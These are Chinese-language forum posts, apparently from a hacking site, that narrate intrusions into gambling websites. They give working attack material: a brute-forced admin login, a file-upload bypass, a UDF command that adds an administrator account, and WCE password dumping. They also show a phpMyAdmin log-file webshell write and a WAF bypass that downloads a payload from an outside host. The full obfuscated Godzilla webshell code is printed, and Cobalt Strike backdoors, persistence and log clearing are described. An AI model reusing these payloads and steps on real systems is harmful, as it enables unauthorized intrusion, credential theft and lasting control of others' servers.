搜索论坛

前言 由于之前网站数据丢失了，发一个之前渗透过的博彩网站记录给大家看看吧。 没事打开电脑开始瞎逛，但是无意间发现之前渗透的非法网站又开起来了，但是只是一个宝塔页面，没有任何价值，于是在同ip下发现一个博彩网站，随之展开渗透 一、信息收集 1.以下由tfxxx来代替域名 锁定网站：tfxxx.com 2.查看服务器ip以及判断是否有cdn 这个没有cdn，很nice 3.目录扫描 总体来说，并没有得到什么有用的价值 4.二级域名扫描 不错，得到了一个后台 admin.tfxxx.com，留着待会看 5.端口扫描 全端口扫描，这里就不截图了，扫的太慢了，基本上也没有啥利用的，远程端口更改了，扫出来的是20119端口 二、漏洞探测 1.后台页面 通过上面收集的信息来说，还是比较局限，先不管吧，有一个后台，就来尝试一下后台登录，看是否ok 2.猜账户 随手一个admin，进入到输入密码和安全码的页面，输入其他账号会提示用户名不正确，所以这里判断账号为：admin 3.爆破安全码 这里开始爆破安全码，因为进入到这个界面随便输入一个安全码它会提示安全码不正确，所以我在想如果把安全码输入正确了密码不对，它是不是只会提示密码错误？怀着这个问题用burp来爆破看看 通过URL解码，然后在网站后台登录看看，既然这样提示了，那应该是验证了我的想法，所以这里判断安全码为：123456 4.爆破密码 既然有了用户名和安全码，那就试着来爆破一下密码，最终最终！弱口令啊，YYDS！！密码：qwe123456 成功登录 三、漏洞利用 1.文件上传 来到后台开始寻找是否有上传的地方或者其他能getshell的地方，找到一个上传点，抓包，提示上传失败 然后试着把Content-Type：application/octet-stream改成Content-Type: image/jpg，万万没想到这么顺利，直接上传成功 2.蚁剑连接 找到刚才的小马地址，成功连接 四、提权 1.尝试突破命令限制 其实这里已经是system权限了，但是蚁剑和菜刀都无法执行命令，尝试了各种办法突破都未果，还是我太菜了 2.使用sys_eval函数 这里使用udf提权的方式，将sys_eval引入进去，然后完成执行添加账户，在加入用户组，我不能执行sys_exec不知道为啥... select sys_eval('net user admin 123456 /add'); 成功登录桌面 3.获取管理员密码 wce下载 这里使用wce获取管理员明文密码，掌握到常用密码，可以进一步掌握这人的信息，大家都懂哈 查看当前登录的用户及加密的密码 wce-universal.exe -l 查看当前用户登录的详细信息 wce-universal.exe -lv 查看明文信息 wce-universal -w thehackerworld版权所有，转载请注明出处。【原创】

确定目标 收集信息 x.x.x.x 首先常规测试方法一顿怼，目录扫描，端口扫描，js文件，中间件，指纹识别，反正该上的都上。。。。 随手加个路径，报错了，当看到这个界面我瞬间就有思路了 为什么这么说呢，因为之前我就碰见过这样的网站报错， 这是一个php集成环境,叫upupw，跟phpstudy是一样的 upupw --> pmd phpstudy --> phpmyadmin 突破点 这个集成环境包也有个phpinfo的页面，跟数据库管理界面 u.php 测试一下弱口令 root/root 连接成功后就可以看到phpinfo的页面 好了现在问题变成phpmyadmin拿shell getshell 三步拿shell set global general_log='on'; SET global general_log_file='D:/xxxx/WWW/cmd.php'; SELECT '<?php assert($_POST["cmd"]);?>'; 当执行第三步的时候页面 卡在执行中。。。没有反应 瞬间感觉不对，可能存在waf 换了个免杀马试试，先写到txt里边看看成否成功 没有任何问题，下面直接写入php文件 可以写入，直接去连接shell 果然有waf,当时写入的时候就感觉到了，不免杀的shell，sql语句执行不了 绕过waf 怼了半天都不知道是什么鬼waf，用下载文件试试 为了避免拦截php代码的waf，我这里远程下载的脚本是利用JavaScript转写php SET global general_log_file='C:/Users/Administrator/Desktop/UPUPW_AP5.5_64/htdocs/11.php'; SELECT '<script language="php"> $a="http://x.x.x.x:81/shell.txt";$b="file"."_g"."et_"."contents";$b = $b($a);file_put_contents("shell.php",$b); </script>' 访问11.php 就会生成shell.php 这里的shell也是用了哥斯拉的免杀shell <?php session_start(); @set_time_limit(0); @error_reporting(0); function E($D,$K){ for($i=0;$i<strlen($D);$i++) { $D[$i] = $D[$i]^$K[$i+1&15]; } return $D; } function Q($D){ return base64_encode($D); } function O($D){ return base64_decode($D); } $P='pass'; $V='payload'; $T='3c6e0b8a9c15224a'; if (isset($_POST[$P])){ $F=O(E(O($_POST[$P]),$T)); if (isset($_SESSION[$V])){ $L=$_SESSION[$V]; $A=explode('|',$L); class C{public function nvoke($p) {eval($p."");}} $R=new C(); $R->nvoke($A[0]); echo substr(md5($P.$T),0,16); echo Q(E(@run($F),$T)); echo substr(md5($P.$T),16); }else{ $_SESSION[$V]=$F; } } 尝试了这么多次 进程里没有waf进程 权限是system 脱源码 上传抓密码工具，直接获取管理密码,登上服务器 留后门，清理痕迹 多留几个后门，万一被删 这个网段还有这么多机器 源码 打开源码才发现waf是360webscan 总结： 1.信息收集，目录扫描，端口扫描，JS文件敏感文件扫描，中间件扫描，指纹识别无任何可利用信息 2.通过在网址后加入错误路径，报错信息“为找到，法海不懂爱，页面显示不出来”，该系统是php集成环境upupw 3.该环境有个叫phpinfo的文件为u.php，输入弱口令root/root，可直接进入phpmyadmin，同时可查看phpinfo的信息，暴露出网站的绝对路径为D:/xxxx/WWW/UPUPW_AP5.5_64/htdocs/ 4.phpmyadmin通过写入日志获取shell set global general_log='on'; SET global general_log_file='D:/xxxx/WWW/UPUPW_AP5.5_64/htdocs/cmd.php'; SELECT '<?php assert($_POST["cmd"]);?>'; 5.可直接写入一句话，但是连接shell，被WAF拦截 6.通过远程下载的脚本是利用JavaScript转写php绕过WAF(360webscan) SET global general_log_file='D:/xxxx/WWW/UPUPW_AP5.5_64/htdocs/11.php'; SELECT '<script language="php"> $a="http://x.x.x.x:81/shell.txt";$b="file"."_g"."et_"."contents";$b = $b($a);file_put_contents("shell.php",$b); </script>' 7.访问11.php 就会生成shell.php shell.txt: <?php session_start(); @set_time_limit(0); @error_reporting(0); function E($D,$K){ for($i=0;$i<strlen($D);$i++) { $D[$i] = $D[$i]^$K[$i+1&15]; } return $D; } function Q($D){ return base64_encode($D); } function O($D){ return base64_decode($D); } $P='pass'; $V='payload'; $T='3c6e0b8a9c15224a'; if (isset($_POST[$P])){ $F=O(E(O($_POST[$P]),$T)); if (isset($_SESSION[$V])){ $L=$_SESSION[$V]; $A=explode('|',$L); class C{public function nvoke($p) {eval($p."");}} $R=new C(); $R->nvoke($A[0]); echo substr(md5($P.$T),0,16); echo Q(E(@run($F),$T)); echo substr(md5($P.$T),16); }else{ $_SESSION[$V]=$F; } } 8.通过格拉斯连接shell，然后查看进程tasklist，并无杀毒软件，查看权限whoami，是system权限 9.上传 hash抓取本地密码，可抓取windows本地用户名和密码 10.上传cs的生成的后门文件，并执行。 11.下载源码，发现WAF使用的360webscan